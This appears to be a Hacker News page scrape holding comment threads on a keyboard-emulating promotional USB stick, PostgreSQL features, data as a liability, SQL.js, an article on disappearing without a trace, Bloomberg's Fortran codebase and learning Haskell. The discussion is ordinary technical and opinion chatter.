almightysmudge 2 days ago 3 replies      
Stuns me that someone thought this would be a good idea.

Oh hey my free USB device helpfully made me go to a webpage without warning and without permission, these guys are wizards and deserve my custom.

px43 2 days ago 0 replies      
Ancient. The latest fun project enabling this sort of thing is Samy's USBDriveby project:


And yes, you totally can detect operating system, bypass HID protections, and deliver custom weaponized payloads in the form of scripts catted into the command prompt.

Someone 2 days ago 0 replies      
Anybody know whether https://www.gdatasoftware.com/en-usb-keyboard-guard works well and can be trusted?
j_s 2 days ago 0 replies      
What is the url?

Seems like a juicy target for a hack on the server side.

SomeoneWeird 1 day ago 0 replies      
There's an off-the-shelf USB that you can buy called a Teensy[1] that is programmable and automatically registers itself as a USB HID. Very similar to what is described here.

[1] https://www.pjrc.com/teensy/

kazagistar 2 days ago 1 reply      
My employer blocks USB memory sticks... but still permits keyboards and mice for convenience. I am not sure what they hope to accomplish.
rblatz 1 day ago 0 replies      
Hyundai did this years ago in 2011 when I bought my car. They sent me a USB key that emulated a keyboard. It opened up the Hyundai registration page, and may have typed my VIN in for me. This isn't new at all.
moyix 2 days ago 0 replies      
Apparently some of these are reprogrammable by just rewriting the onboard I2C EEPROM:


Could be a fun weekend project.

ggchappell 2 days ago 2 replies      
I don't worry much about inserting wacky storage devices, as I run Linux, and I don't have any kind of auto-run enabled.

But this would still work on my machine, right? (I mean that the key combo would be entered; it might not actually bring up the web page, depending on my setup.)

jonknee 2 days ago 5 replies      
And that's a feature, not a bug. I have a YubiKey and it does a similar thing, but for good not evil. It would be tricky for an OS to not register keyboards (after all, how would you vouch for an input device without using an input device?).

tl;dr don't plug unknown things into your computer.

robryk 2 days ago 0 replies      
I wonder if it is possible to fingerprint USB keyboards of same make (with same dummy serial number) to tell them apart. For example one could try to exploit frequency deviations of the crystal oscillator in the keyboard.
s_kilk 2 days ago 0 replies      
A few years back a colleague (at the time) went to a MongoDB event where they pulled this same stunt, handing out usb drives that would act like a keyboard and hijack the machine.

Both clever and reprehensible.

conceit 1 day ago 0 replies      
is this done to boost the called site's search rank?
javajosh 1 day ago 0 replies      
It's not an attack unless you write to the hard-drive. This is more of a nuisance, and a bad move, and troubling for what it could be, but the thing itself looks harmless.
PostgreSQL Magic project-a.com
231 points by websec  2 days ago   63 comments top 7
timonv 2 days ago 5 replies      
As a fellow Postgres amateur wizard, love the positive attention that postgres seems to be getting more and more, and some half databases less and less (unless you actually need map-reduce, ofcourse. You probably don't. /trollface)

What I miss though in this article, and where I think postgres shines majorly compared to other rel dbs, are window functions.

It allows you to apply a partition to a set. You can do some great wizardly magic with this, like 'give me each row matching this and that, which matches the last occurence of given column'.

Edit: WITH clauses (CTE) are great for avoiding a lot of nesting with subqueries and/or reusing subqueries throughout the main query. They have added functionality for recursion, but I suppose that unless you do some kind of tree traversal on big data sets, benefits of that are soso, readabillity and all that.

Edit2: I had to double check this, I never use custom types, using UNNEST() ARRAY[] on a custom type is superfluous. Just use ROW().

rosser 2 days ago 2 replies      
Quibble: the "now()" function doesn't return the time of statement start; it returns the time of transaction start.

 $ psql -q rosser=# begin; rosser=# select now(); now ------------------------------- 2015-09-11 02:28:54.262142-07 (1 row) rosser=# select now(); now ------------------------------- 2015-09-11 02:28:54.262142-07 (1 row)

whistlerbrk 2 days ago 0 replies      
So many amazing features that are incredibly relevant to modern web development. I've switched over a personal project from MySQL to PG recently and this time I'm not looking back.

On 9.4 I have the HSTORE and JSONB types as well as range types which are incredibly useful. If you have a solid language library wrapper for PG you can spend far less time mangling data from one format to the next and just get to work. I love it.

zrail 2 days ago 0 replies      
I have seen magic done with custom types and aggregates. For example, I know of projects with run-length-encoded bitsets and custom aggregates for doing set operations and counts, sort of like Redis' bitset commands but built into PG. This is a massive space optimization, because otherwise you'd just have a join table with zillions of tiny rows.
mhd 2 days ago 7 replies      
I have to admit that I'm still not quite sure about arrays in relational databases. Don't get me wrong, I use them all the time, but it kinda feels like when you've got tables that you just know could be normalized more thoroughly.

Also: If someone has a good version-control wrapper for stored procedures, that would be swell. And while I'm doing the wishful thinking shtick, maybe a Coffeescript-like preprocessor and a good linter?

sigma2015 2 days ago 4 replies      
What tool do you use for visualizing table relationships (foreign key constraints f.x.) in PostgreSQL?
dsugarman 2 days ago 0 replies      
The best part of this for me was the batch updates. I am a little confused at the need for a user defined type that is a copy of the schema of the table. Wouldn't it be better to do use:


That way you wouldn't need to maintain a table and a type with the exact same schema, no?

Data is not an asset, its a liability richie.fi
214 points by markonen  3 days ago   108 comments top 28
cwp 3 days ago 5 replies      
He's on to something here, but I think the asset/liability duality isn't a matter of your point of view. Code really is a liability, even from the high-level view in the boardroom. The asset is functionality. If you can get more functionality with less code, you improve your balance sheet.

By analogy, data is also a liability. The asset is insight.

zeveb 3 days ago 3 replies      
The reason to collect everything (or rather, more things than you think you'll need to answer the questions you think you'll need to answer) is thatyou could be wrong about what data are required to answer the questions you've identified, and that you could be wrong about which questions you will care about.

And historical data can be extremely useful, e.g. when looking at seasonal or cyclical trends (woe betide the grocer who doesn't stock up on turkeys in mid November, which means woe betide the grocer who doesn't order turkeys in the summer).

Yes, he's absolutely right that data management and privacy impose a cost: the cost of storing a GB of data is more than S3's 10. It takes a human being to make a judgement call about whether this data is likely to be worth its overall cost and risk. That's why managers and other decision-makers get paid what they get paid. 'Data is a liability' is a nice soundbite, but it doesn't capture the full reality; one can't manage to soundbites.

colin_mccabe 3 days ago 1 reply      
This article is highly misleading. Sure, certain kinds of data (like credit card data or medical data) can be a liability if not properly managed. If you are working in one of those industries you already know that (although arguably many financial and medical companies underestimate the risks).

In contrast, data about what users have clicked, comments on an online forum, or who has friended who on your social media site is not a liability. In many cases this data is already public. Even in cases where it's not, it is usually incredibly boring for any hacker to steal, like what web pages John Doe has clicked on in the last 10 minutes. Hackers are going to go after stuff like social security numbers or credit card numbers, not data about the average length of time people spent looking at Pepsi Inc. web page layout A versus web page layout B.

The argument that you should only store "the data that you need" is a circular one. How do you know what data you need? Well, you run an analysis. How do you run an analysis? Using the data you have. Short-sighted policies like throwing away historical data, as the article recommends, effectively blind you to long-term trends.

tomlock 2 days ago 0 replies      
>>Think this way for a while, and you notice a key factor: old data usually isnt very interesting. Youll be much more interested in what your users are doing right now than what they were doing a year ago. Sure, spotting trends in historical data might be cool, but in all likelihood it isnt actionable. Todays data is.

Uhhhh, really? There have been a lot of times in my past where, as an analyst, I wished I had an bunch of historical data to measure the seasonality of trends. Am I the only one who baulks at this comment? Is this a startup-oriented perspective?

roymurdock 3 days ago 0 replies      
It depends on what industry you're in.

So JPMorgan took a bit of a reputation hit when hackers compromised the data of 83m of the company's clients. [1] The financial repercussions were minimal, if there even were any to begin with. You can bet they still collect and store all the data they can. They don't really care, and customers don't really care all that much either.

On the other hand, we have medical data, which is essential for pharmaceutical and academic research but would be very, very harmful in the wrong hands. A non-compliant company will get smacked with heavy fines under HIPAA for not safeguarding data in a strict, standardized manner.

Until government regulation makes data breaches substantially costly for Company X (Target, Adobe, LastPass, Department of Personnel Management, etc.), Company X will continue to gather as much data as possible.

It's an asset with unbounded upside (who knows what great economic engine data might fuel in 5-10 years) and no financial downside because it carries no legal risk, and very minimal storage costs.

[1] http://dealbook.nytimes.com/2014/12/22/entry-point-of-jpmorg...

pisipisipisi 3 days ago 1 reply      
Cultural difference: In US, your customer DB is an asset like anything else. In EU, your customer database is a liability.
mizzao 3 days ago 1 reply      
Another way of looking at the article is that it's more important to have the right data than just having lots of data. So it's very important to think about the questions that one would want to answer and design data collection to capture the answers, rather than just going ahead and storing everything in a brute force way.
ohitsdom 3 days ago 1 reply      
A $125 billion market for big data solutions is NOT a sign that data is a liability. What is the value of that data?

I'm also skeptical of the compliance/privacy argument. If you're collecting any data at all, it's a potential liability. The volume of the data doesn't change the risk level much.

dredmorbius 3 days ago 0 replies      
I'm quite happy to see others starting to recognize this. It's a problem, as someone who's dealt with "big data" since the early 1990s, that I've been quite well aware of for several decades.

An exceptionally peculiar aspect of digital data is that, while it may remain in the boxes and cages provided for it, it's got a notable tendency to find itself liberated. Often without warning, and not detected for days, weeks, months, or longer, afterward (as in this case). In the real world we've got friction, especially associated with data processing and transfer. In digital form, far less so. Sometimes friction is good.

What you almost always want to do is to roll data up to non-individualised aggregates as soon as practically possible. The rest is just dry powder waiting for a spark.


mmaunder 3 days ago 0 replies      
Totally agree. Was going to add that an expanding schema is a liability but that seems self evident with the comments about code expansion.

If you've ever built a very busy application you know the truth of this. At first the massive access to data you have seems like a gift and you'll log it all "just in case". You might even brag about the volumes of data you have and speculate about their value to investors and internally. But eventually you realize the risk and cost and cost of managing the risk.

tarr11 3 days ago 1 reply      
Private customer data often includes a liability, but not for the reasons that OP states. The liability is that companies have an ongoing obligation to their customers to protect their private data. However, a lot of data does not have this liability. If it gets published to the world, it wouldn't matter.

This article portrays a common misunderstanding of the accounting terms liability and asset. Just because something has a cost to maintain, it does not make it a liability.

Code is an asset. Data is an asset. Businesses do not value assets at their cost, as the article represents, but in their future economic value.


"Things that are resources owned by a company and which have future economic value that can be measured and can be expressed in dollars. Examples include cash, investments, accounts receivable, inventory, supplies, land, buildings, equipment, and vehicles."


"Obligations of a company or organization. Amounts owed to lenders and suppliers. Liabilities often have the word "payable" in the account title. Liabilities also include amounts received in advance for a future sale or for a future service to be performed."

kainosnoema 3 days ago 0 replies      
This is one reason we decided at Cotap to purge messages after 14 days by default, and only keep them longer if requested (https://cotap.com/blog/customizable-data-retention-for-busin...). Contrary to what one might expect, most users embraced the change.
Tloewald 3 days ago 0 replies      
Somewhat in this vein:

Years ago I worked at a large advertising network that was concerned about fraudulent impressions. E.g. Ads placed "under the fold" or hidden or behind stuff or otherwise generating impressions that weren't real.

I suggested we could build a small piece of supplemental ad code that would load alongside one of our ads in a row page and "look around" see where ads were placed and so on.

The idea was rejected because it would create too much data. I argued that we could trigger the fraud detection code once per n impressions with n being 100 or 1000 and still be able to identify fraudulent sites with statistical certainty (our problem would be false negatives) but they couldn't wrap their heads around merely sampling enough data to answer a question rather than ALL the data, so the idea was rejected.

Of course it's also highly likely that they didn't actually want to detect fraud.

lighthawk 3 days ago 0 replies      
"Then you collect the data you need (and just the data you need) to answer those questions."

If you are providing something to anonymize activity- then sure, if it is legal. And you want to store as little data as possible that would be hazardous if it was made public. But for everything else, it's probably not a good idea to have this attitude.

There are many questions you don't need to answer before you need them, and then it would be good or even necessary to have them historically. For example, auditing changes made to the system or data, logging some requests and responses, tracking user behavior for analysis by marketing, etc. Over time, depending on the site/service, you may want all those things and more.

rdlecler1 2 days ago 0 replies      
Maybe you don't have the resources to analyze the data today, but you still need to collect it for when you do. A history of data can give you a null hypothesis to work with. When we see a drop in traffic in August is it because we're losing relevance, or because August tends to be a slow month.
eanzenberg 3 days ago 3 replies      
Data is absolutely an asset. All decisions are driven by data (could be personal, biased, anecdotal, etc.), so why not make decisions based on more data points? It's cute to think you can "ask questions first, then collect" but this wastes time in 2015. Imagine being asked at Netflix "calculate the % watch through of 18-21 year olds for kids movies", then a week later "for action movies in the 1980s. As opposed to having the viewing info for all your users before these questions arise.

BTW, users DO want you to use their data to improve your service. Otherwise google, facebook, twitter, netflix, etc. would not be as successful as they are. Liability only comes into play when OTHER parties access (legally or illegally) your data.

readams 3 days ago 0 replies      
It's definitely an asset, but it's potentially a dangerous one. It might be like owning enriched uranium fuel pellets. Extremely valuable asset that can power a society, but dangerous if it falls into the wrong hands or is allowed to contaminate the environment.
lcnmrn 3 days ago 1 reply      
Public data is an asset. Private data is a liability.
m52go 3 days ago 0 replies      
First, hat-tip to Marko for running a business with integrity. I really like the parallel between data and finance as it relates to privacy.

As it turns out, banks have a very similar history of making promises & violating them. There are many parallels between banks & debt and data & technology.

I wrote a post titled "Silicon Valley Data is the New Wall Street Debt" that you folks may like:


yuhong 3 days ago 0 replies      
This reminds me of the RadioShack bankruptcy. I don't think the bankruptcy process was designed for "selling" personal data, right?
BinaryIdiot 3 days ago 0 replies      
I think this is a pretty good, general rule. But with everything in technology it's not true for everything. For instance auditing and medical records. Basically the only exceptions are going to be things not actionable in the market.

Good read!

Lerc 3 days ago 1 reply      
If data is a liability aren't we all worse off for knowing that?
tuananh 3 days ago 0 replies      
you make it work for you -> it's an asset. You leave it laying there doing nothing -> it's a liability.

Perspective people.

qihqi 2 days ago 0 replies      
Well, Asset = liability + owner contribution. /s
MikeNomad 2 days ago 0 replies      
Data are an asset. Data custodians are the liability.
xcyu 3 days ago 0 replies      
crimsonalucard 3 days ago 0 replies      
luckydata 3 days ago 0 replies      
SQLite compiled into JavaScript via Emscripten github.com
197 points by sea6ear  3 days ago   55 comments top 12
rhc2104 3 days ago 4 replies      
Sql.js is awesome. It powers sqlteaching.com (on the client side), and the whole site took about 50 hours of work between my wife and I. Most of that time was on the curriculum.
SEJeff 3 days ago 0 replies      
FYI this is what powers the interactive SQL engine for the SQL classes on the Khan Academy. If you've never seen them, it is really cool.



timeu 3 days ago 0 replies      
Would be interesting to see how this benchmarks against the in-memory db of lovefield (https://github.com/google/lovefield)
myoon 3 days ago 5 replies      
Unfortunately, there are a few major downsides to sql.js:

1. Not API compatible with node-sqlite3, so you can't just drop it in and use it with knex or other wrappers.

2. Doesn't support in-place editing of a db. You have to load the entire DB into memory, modify it, and then save it back, making it unsuitable for any concurrent application.

I love the idea of the project though, and it would be awesome not to have to deal with compiling sqlite or using node-pregyp to build embedded chromium apps.

pygy_ 3 days ago 4 replies      
What I would love to see is a SQLite rewrite in Rust. Just enough to support WebSQL and appease Mozilla's concern about the lack of alternative implementations.
SunboX 2 days ago 1 reply      
Did someone try to compile Zebra Crossing (ZXing) to JavaScript using Emscripten? I searched a lot, but sadly didn't find anyone who succeeded. And I don't have enough knowledge about C++ to try it myself.
kgen 3 days ago 0 replies      
SQL.js is a great library -- we use it on http://sqlbolt.com/ to teach SQL right in the browser in a platform agnostic way.
cheyne 3 days ago 1 reply      
Been using this library for a while now. Works great, I based my app https://www.lightroomdashboard.com on it
seanalltogether 3 days ago 1 reply      
I wonder how well this would work for shipping game assets in the browser. One of the nice things I miss about flash was having a single compiled object to store on the server and distribute to end users which contained all the assets and sounds needed for the game. Stuffing all your assets into a sqlite database and sending that over the wire would keep everything nice and tidy.
inglor 2 days ago 0 replies      
I wrote an SQL injection tutorial using this a while ago: benjamingr.github.io/PizzaHack
PSeitz 2 days ago 0 replies      
I would be very interested in benchmarks comparing it to the native version
omegote 3 days ago 0 replies      
Vanishing Point: How to disappear in America without a trace (2012) skeptictank.org
183 points by QUFB  3 days ago   97 comments top 22
morganvachon 3 days ago 4 replies      
A nitpick (beyond the spelling, grammar, and punctuation errors throughout): The part about "most states in the Union require 24 hours before reporting a missing person" is nothing but a Hollywood trope. The fact is, most agencies require a missing person to be entered into their respective state's database within a few hours of the report. I can say unequivocally that Georgia has a two-hour window, as I've entered many such reports during my stint in law enforcement, and that is our state's requirement.

The reason they want to enter the person as soon as possible is so that any checks for that person's info will return a "hit" in time to locate the person. For example, George has dementia, goes for a walk at 8am, and is gone for several hours. He is reported missing at 12pm, and the police report is keyed into the state database by 1pm. At 2pm that same day, George is stopped by an officer and his information ran on the state computer. A hit shows up that states he's a missing-endangered person (endangered due to his mental state), the officer notifies his department so they can notify the family, and all is well. Now, if the bogus 24 hour rule was real, George never would have been reported the day he went missing, and perhaps would have met a grisly demise that night. Timely reporting is a potentially life-saving measure and I really wish television and the movies would stop it with that particularly dangerous bit of misinformation.

leroy_masochist 3 days ago 6 replies      
It's a really interesting topic and I'd say I was disappointed by the article for several reasons:

1. Very outdated in terms of the extent to which people hiding today would leave a digital signature. The article literally suggests leaving no available photographs of you, to the point where acquaintances have to work with a sketch artist to put your picture out.

2. Some very naive suggestions for jobs to take while on the run, including doing data entry, working as a day laborer, and joining the Peace Corps.

3. Made-up tinfoil-hat "facts". For example: "Satellites can bounce LASER light off of your windows and, by measuring the minute distance differences between a vibrating window and the satellite, reconstruct your speech -- from orbit!"

Note: this is not true. The pinnacle of laser surveillance (which is actually a real thing) is measured in the hundreds of meters.

This is actually a really cool topic, and best practices in escape and evasion are fascinating. I think the outline of a better manual would look like:

1. Figuring out where you're going to hide (best hope is bland suburb of large metro area in a far-away country where you're not ethnically unusual....e.g., Sao Paulo, Lagos, Taipei, or a frontier market that attracts a lot of expats, e.g., Mongolia, Nairobi, Manila). Additional discussion of extradition law and whether you should prioritize non-extradition countries relative to your country of citizenship. Additional discussion of how to learn the language and culture of your new home without attracting attention.

2. Figuring out how you're going to survive in your new life; refinement of potential destinations based on skill set, age, life goals, etc.

3. Prepping your new life (surreptitiously creating bank accounts, documents, contacts in new residence).

4. Making the break; how to disappear so that authorities classify you as missing and presumed dead.

5. Forensic considerations (facial recognition, DNA, voiceprint, fingerprints, digital signature).

Would be great to hear others' thoughts on what such a manual would look like, I love to nerd out on this kind of stuff.

epalm 3 days ago 3 replies      
reality_czech 2 days ago 0 replies      
"I wish you the very best and hope that some of these suggestions and contact references prove helpful though most of it, I'm afraid, is probably unworkable, silly suggestions that won't help you one bit"

So the author himself admits that this is a bunch of silly nonsense that won't help you at all. For some inexplicable reason the article continues past this point.

thrownaway2424 2 days ago 1 reply      
I really enjoyed this article just because it reminds me so much of the early internet: wall-to-wall libertarian derangement. UCC 1-207. Sovereign Citizenship. And it got slashdotted by this link. Really takes me back.
ryanlol 3 days ago 2 replies      
Certainly an interesting writing style:

>Remove the radiator filler cap if the engine is cold. (Opening the cap with the engine hot can get you badly burned. The fluid can start to boil once the pressure is relieved and spray all over you. The fluid will be quite painful resulting in first and second-degree burns. It's not likely to be disfiguring but if you accidentally burn yourself, you can very well go ahead with your plan to escape however your mind might be focused entirely upon the pain and not upon escape. With the engine cold you don't have to worry about getting burned.)

That certainly seems like a rather elaborate way of explaining that touching hot things burns.

akallio9000 2 days ago 0 replies      
When I read his description of "radiator fluid" and dumping gravel into the oil fill of a car, I began to have my doubts, but when he suggested that a revolver with the cylinder swung out might still have a bullet in the chamber, all doubts that he didn't know what he was talking about were erased.
Tloewald 2 days ago 1 reply      
I wish it were organized in terms of utility relative to difficulty. Walking everywhere with a hat and buzz cut to avoid shedding hair is kind of insane and is more likely to attract attention than prevent you from being tracked by your DNA.
mirimir 2 days ago 1 reply      
Although it's quite dated, I'm willing to accept the author's claim that he originated much of the "how to disappear" stuff. And so I'd love to give him my $5. But perhaps ironically, Smashwords (the bookseller) only accepts PayPal and credit/debit cards. However, if some kind person would gift it to me, I would reimburse the price via Bitcoins :)
boomskats 3 days ago 1 reply      
'If you plan on going into hiding and want to leave a big hint, consider buying a copy of this book from the author immediately beforehand"
WillyNourson 2 days ago 1 reply      
I love this thing because if you remove the first four points, it's just a good how-to about life in general. Actually if you follow these rules you may never have to vanish :

#Discard your old life.#Limit the resolve and resources of your opposition.#Run from your opposition (and your old life.)#Hide from your opposition.

Make new friends.Acquire a (new) identity. (Legal papers: Birth record, Social Security #)Find gainful employment.Pay your taxes.Get medical, life, and automotive insurance.Get a credit card -- and keep it paid up.Perhaps take college courses to learn a new marketable skill.Acquire and maintain respectability in your community.Find a wife or husband: Make a (new) family.Don't drink heavily, don't use any illegal drugs, don't do any crimes.Die with dignity.

pp19dd 3 days ago 5 replies      
Rather interesting, though, the scope is limited to USA alone.

Supposing you make your way out of USA, a good solution for restarting your life is to join the French Foreign Legion. They'll take recruits from 17.5 - 39.5 years old. No questions asked, for a year. You literally start with a new name, an assumed identity which is a sign-up requirement. Their tagline is "the school of second chance."

You get fed, you get training, you get a salary. If in that year you do well, learn the language, learn soldiering, progress, you can get French citizenship. After the first year, you can either continue your career under your assumed identity, or reconcile your issues with your country of origin.


V-2 2 days ago 0 replies      
Lovely, but my favorite is http://www.wikihow.com/Survive-Living-Through-a-Coup reportedly from a person who's survived quite a few back in the day.

"Has your country's dictator been overthrown? Did he seem fatherly and protective or just overbearing and threatening? Are you feeling confused as to what to feel? Have you exchanged one bad situation for another? Has the military decided they know better how to run things? If any of these things apply to you, you'll find yourself in a country in turmoil and it's time to think about your immediate survival needs."

It contains plenty of seasoned, golden advice, eg.

"Don't panic. The worst thing to do in any situation is to panic."

As well as some useful guidelines on how to deal with harsh political reality of a revolution:

"If there are more than one party up for vote, request time with them to see what they believe in. Pick the one that more closely fits with your values."

tired_man 3 days ago 0 replies      
Good thoughts, where they stayed on the topic. Too much political commentary for me.
guizzy 2 days ago 1 reply      
On one hand the author says that if you're running from a crime you will get caught. But then after gives tips to escape from someone with the ressources and determination to have skin samples from hotel rooms analysed and access to thermal imaging satellites.

Looks to me like the author doesn't know what people would be running from. I doubt the authorities would use LASER SURVEILLANCE SATELLITES for anything they intend to pursue with less zeal than a very serious felony.

xacaxulu 2 days ago 0 replies      
I would start from the other side and start learning about how surveillance works, and the numerous forms of SigInt/HumInt that can grab you anywhere.If you want to disappear but you still want to use credit cards, a smart phone, drive around in a car or login to regular websites (social media for sure) from the same computer, I question your dedication :-)
jzwinck 2 days ago 0 replies      
If you want to disappear, maybe you should do it in a place other than America, so that you will not need to so thoroughly marginalize yourself (panning for gold?!).
MrJagil 2 days ago 0 replies      
This linked video is very interesting: https://www.youtube.com/watch?v=YxpUc8lj-CY
zw123456 2 days ago 0 replies      
This reminds me very much of Breaking Bad when Walter went to the "vacuum cleaner" who hid him in a cabin in the woods and had to follow many of the rules outlined in this article.
Simulacra 3 days ago 0 replies      
Actually have you ever been to an Ikea alone? You can get pretty lost..
Cub3 3 days ago 0 replies      
PhantomGremlin 2 days ago 0 replies      
I'm surprised that nobody has mentioned a very infamous person who disappeared for many years. Whitey Bulger.[1]

All it takes is friends and money.

[1] https://en.wikipedia.org/wiki/Whitey_Bulger#Fugitive

Bloomberg Runs on 25M lines of Fortran (2006) etrading.wordpress.com
160 points by charlieirish  3 days ago   148 comments top 30
apaprocki 3 days ago 4 replies      
Sigh. Bloomberg-er here -- this article is old. There is certainly a lot of Fortran remaining in sections (you don't rewrite working code with C linkage in another language just because -- you rewrite it if you have something to gain), but it is nowhere near as bad as this old article makes it sound. Many teams are C++ only and have been for a long time (see our open-source code on GH for a sample). Keep in mind that if you deal in absolute numbers you are missing the bigger picture -- the actual real number will be much smaller and it will be an even smaller percentage of the total codebase.

edit: Can mods put (2006) in the title? Seems reasonable...

radmuzom 3 days ago 13 replies      
The article seems to assume that there is something "wrong" with running on 25M lines oF Fortran. It does not provide any technical reason why Fortran is not the right tool for the job. Why does this need to be "Web 2.0"?
ig1 3 days ago 2 replies      
(In a previous life I worked at Bloomberg)

I don't remember the exact figures but 25m lines of Fortran seems plausible, but it was still the minority of the code base. The majority at the time was in C and C++, with probably a few million lines of Perl and Javascript as well.

Plenty of the Fortran dates from the 80s, rewriting it in a modern language would be a huge project which lots of risks and limited upside. No significant new fortran has been written for a long long time (>10 years).

It's also a mistake to think of Bloomberg as a single piece of software, it's closer to an app store, there's are thousands of specialist apps (functions in Bloomberg terminology) and most users only use half-a-dozen, but which half-a-dozen varies significantly between users.

This makes it very hard to displace wholesale. There are individual pieces a competitor can go after but identifying a subset of functionality that's enough to convince users to switch is hard.

There's also a lot of stickiness which goes beyond pure functionality. Network effect and brand are also key parts (having a Bloomberg Terminal is a status symbol).

PaulHoule 3 days ago 1 reply      
I have been looking at some projects at Bloomberg from the outside and even those the projects are interesting I don't think I'd want to work their because of bureaucracy and inertia -- it's the kind of place where you'd need to get approval to install a text editor on your machine.

I have found that often "high profits" get in the way of customer service because they are a disincentive to "quality is free" thinking and make it possible to sustain the unsustainable for way too long.

To take an example, Cable companies are so profitable that they think nothing of the cost of replacing cable boxes that break, or of excessive truck rolls. These not only cost money but they anger consumers. My mother-in-law quit cable in disgust and switched to OTA TV after she had three cable boxes burn out in three months and would have to go stand in an long line to return it and pick up a new one.

Quality is free and screwing up is expensive -- even if you can afford to screw up it costs you customers and it costs you employees. But again, turnover is no problem if you are making enough money you can afford to spend 5x what things should really cost.

bradleyankrom 3 days ago 1 reply      
It's a lot of C++ today. In fact, they have open-sourced a lot of the in-house tools they use, eg bde: https://github.com/bloomberg/bde
drglitch 3 days ago 2 replies      
BBG's competitive advantage is not data - in fact, it's pretty mediocre. Any reasonably large player sources their own data feeds due to too many holes in the former.

BBG's killer features are support and _chat_ - chat with other _trusted_ counterparties who also paid the admission price.

beezle 3 days ago 0 replies      
It would have been interesting to know if they are using Fortran 95 or the more recent (and very modern) 2003. People who like to beat on Fortran rarely know that it has evolved quite a bit since '66 and '77
matthewaveryusa 3 days ago 1 reply      
I worked at bberg for 4 years. Changed about 2 lines of fortran code. Some people do more, others so less, but the norm is you'll spend a sliver of your time in fortran.

Great place to work, too bad it's in NYC

baldfat 3 days ago 0 replies      
A little Wikipedia information:

Market share has grown since this was written in 2006.

Market share in 2007 26% and 2011 30%

Money:315,000 Bloomberg Terminal subscribers (2 year subscriptions) worldwide at $20,000 per user = 6.3 BILLION dollars a year!

EDITED for spelling

smanzer 3 days ago 0 replies      
Unhappy academic here - codebases with millions of lines of Fortran are very prevalent here as well. It is both better and worse than a lot of people think; like a lot of the other comments said, that code is rarely touched, but when you need to touching it can be very painful. Modifying old Fortran is rough, mostly because of that awful, awful IMPLICIT keyword. Though I will say that the native multidimensional array support does make certain sections much easier to read than corresponding vanilla C code.
edu 3 days ago 0 replies      
The article is from 2006, should be noted on the title. And, anybody knows if the situation is still the same?
stevoo 3 days ago 0 replies      
I have to disagree with having a company actually coming in and taking out everything that bloomberg has been building the past years.This is an extremely hard market to get it. Bloomberg is extremely dedicated at what they do and they do not take competition lightly. They do use there massive power to make the life of competition as hard as they can.

As for Bloomberg there terminal and all of the services that they provide is top notch. I have a lot of friction with all of there data, and this is by far the best i have worked with.

monopolemagnet 3 days ago 1 reply      
By comparison, this is 33% more LoC than a BWR/PWR nuclear reactor (Monte Carlo method / quadruple integral () equivalent) simulator product formerly known as CORETRAN-01.
pma 3 days ago 7 replies      
Bloomberg terminal and Thomson Reuters are certainly ripe for strong competitors.They are basically operated as monopoly for decades.Yc,developers and others should take on this challenge. http://www.nytimes.com/2015/09/10/business/dealbook/the-bloo...
melling 3 days ago 5 replies      
This article is from 2006. I imagine something has changed in 9 years.
zimbatm 3 days ago 1 reply      
When the compiler code size is a fraction of the whole it would actually make sense to improve on it instead of rewriting everything. Like Facebook did for PHP and their HHVM. Obviously Fortran doesn't have a speed problem but it could be improved in other ways like static analysis and nicer syntax notations.
shitgoose 3 days ago 0 replies      
In Fortran one can add two matrices: A=B+C. Try it in C++ (NumPy is better that way, but still this is an extension to a rocky foundation). The amount of freely available high quality math/statistical libraries for Fortran is unmatched. Why in the world would you give up on this just because you can use Google account? Google Payments for settlement?? WTF? Settlement is a bit more then credit card charge or moving money between checking accounts. Google Fiance as a ticker plant?? Yea, right. Even Yahoo provides options data, Google has just basic stock prices. Compare it with BBG that has everything. Build terminal in Web Kit? Why???

Every time I see suggestions like this, I remember minions, rushing from one framework to another - "koonga la mala makuna, koonga!".

jamesrom 3 days ago 0 replies      
And there are 6 million rivets in the Sydney Harbour Bridge.
josephmx 3 days ago 1 reply      
This reads a bit like the old "Google will rule the world!" blog posts, doesn't it?
tempodox 3 days ago 0 replies      
I don't know how comparable this is, but JaneStreet seem to be quite happy with OCaml. I for one would give that some consideration before actually going C++. And that's ignoring the question why they would depart from Fortran in the first place.
USNetizen 3 days ago 0 replies      
People would be really surprised how much of the critical infrastructure of this country in government and enterprise runs on technologies around half a century old. This is nothing new. The IRS still uses millions of lines of COBOL to process our tax returns, the VA uses millions of lines of MUMPS (M) to store and process health and benefits records, and the list goes on and on. It's not going anywhere soon, either.

People skilled in these legacy languages and technology stacks are also amongst the highest paid and most in-demand in the country, at least here on the east coast in places like New York and DC.

oneJob 3 days ago 0 replies      
Just read the article. Yeah, a Bloomberg terminal does a lot (a lot alot) more than scroll "news tickers, checking Bloomberg email, and trading." When the author suggests that Google might make a play for market share (or some other Web 2.0 player), it is clear that there is an enormous lack of understanding as to exactly what Bloomberg is, as a product.
eb0la 3 days ago 0 replies      
I though Fortran programmers are more expensive than C++ ones; but itjobsearch.co.uk says they aren't.

Fortan programmer: 45,000 GBP (3 month avg), +23% salary change from last year

C++ programmers: between 47K GBP to 100K (for c++ quants).With 3-5% average salary change from year to year.

I don't know Fortran; but looks like the fame about its high costs comes from mainframe hardware (which also runs C++, btw).

crb002 3 days ago 0 replies      
Bloomberg can write a one page Python flask/bottle wrapper around any of that Fortran and serve it up as a microservice. They got Pang Ko from Mathworks who is one of the top parallel computing data structure minds in the world. I'm betting Bloomberg will be around until another player like JP disrupts the market with a truely distributed trading platform.
anonu 3 days ago 0 replies      
I didn't notice the "2006" in the title until I read that the terminal cost a grand a month! I thought something was off!! Bloomberg Terminal costs more like $2k/month per user nowadays... maybe more??
meerita 3 days ago 0 replies      
I know Bloomberg is the Kraken of the softwares out there, but i wonder how many lines lines would be in other langs?
spacecowboy_lon 3 days ago 0 replies      
Only 1500 coders I recall at British Telecom hearing oh we need to put extra 800 developers on a single product.
allenwlee 3 days ago 0 replies      
In my mind, Markit is the biggest future threat to Bloomberg
1971genocide 3 days ago 1 reply      

How can you trivially conclude that its would be easy to provide the same speed as Blomberg terminal ?

If I am not mistaken even shaving off fractions in terms of time has a lot of value.

And maybe you need 25 million lines of FORTRAN code to achieve that efficiency ?

vasche 3 days ago 1 reply      
What I Wish I Knew When Learning Haskell stephendiehl.com
192 points by andars  1 day ago   53 comments top 12
skimpycompiler 1 day ago 1 reply      
What I still do not know and always wished to know when I learned Haskell was how to write efficient code easily. I wrote huge projects with thousands of lines knowing nothing about C++ execution model and had insanely fast code (that could have been made even faster - but I was not that kind of expert) but with Haskell I have to be an expert to really write code that is as performant as something that would take me much less time to write in C/C++.

Just writing simple efficient matrix multiplication is a pain. It took me a couple of days to write a working quicksort.

